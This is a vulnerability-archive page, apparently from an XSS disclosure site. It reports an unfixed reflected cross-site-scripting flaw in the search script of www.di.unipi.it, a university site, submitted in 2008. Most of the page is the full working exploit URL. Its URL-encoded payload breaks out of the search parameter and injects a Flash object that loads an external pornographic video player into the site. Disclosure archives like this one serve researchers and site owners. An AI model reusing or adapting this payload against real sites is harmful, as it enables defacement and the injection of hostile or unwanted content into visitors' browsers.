Security researcher HardPorn, has submitted on 29/04/2008 a cross-site-scripting (XSS) vulnerability affecting www.di.unipi.it, which at the time of submission ranked 12781 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 29/04/2008 |
Date published: 06/06/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: HardPorn |
Domain: www.di.unipi.it |
Category: XSS |
Pagerank: 12781 |
|---|
URL: https://www.di.unipi.it/cgi-bin/search?stxt=%22%3E%3Cobject+classid%3D%27clsid%3Ad27cdb6e-ae6d-11cf-
96b8-444553540000%27codebase%3D%27http%3A%2F%2Ffpdownload.macromedia.com%2Fpub%2Fshockwave%2Fcabs%2F
flash%2Fswflash.cab%23version%3D9%2C0%2C18%2C0%27width%3D%27480%27+%A0height%3D%27400%27+id%3D%27por
noPlayer%27+align%3D%27middle%27%3E%3Cparam+name%3D%27allowScriptAccess%27+value%3D%27sameDomain%27+
%2F%3E%3Cparam+name%3D%27allowFullScreen%27+value%3D%27true%27+%2F%3E%3Cparam+name%3D%27movie%27+val
ue%3D%27http%3A%2F%2Fwww.pornotube.com%2Fplayer%2Fv.swf%3Fv%3DbT0xNjE1NDUyJmFtcDtsb2NhbD10cnVlJmFtcD
t1PTEz%27+%2F%3E%3Cparam+name%3D%27bgcolor%27+value%3D%27%23000000%27+%2F%3E%3Cembed+src%3D%27http%3
A%2F%2Fwww.pornotube.com%2Fplayer%2Fv.swf%3Fv%3DbT0xNjE1NDUyJmFtcDtsb2NhbD10cnVlJmFtcDt1PTEz%27+allo
wFullScreen%3D%27true%27+bgcolor%3D%27%23000000%27+width%3D%27480%27+height%3D%27400%27name%3D%27por
noPlayer%27+align%3D%27middle%27+type%3D%27application%2Fx-shockwave-flash%27pluginspage%3D%27http%3
A%2F%2Fwww.macromedia.com%2Fgo%2Fgetflashplayer%27+%2F%3E%3C%2Fobject%3E |
|
Click here to view the mirror
|
|
|
| 
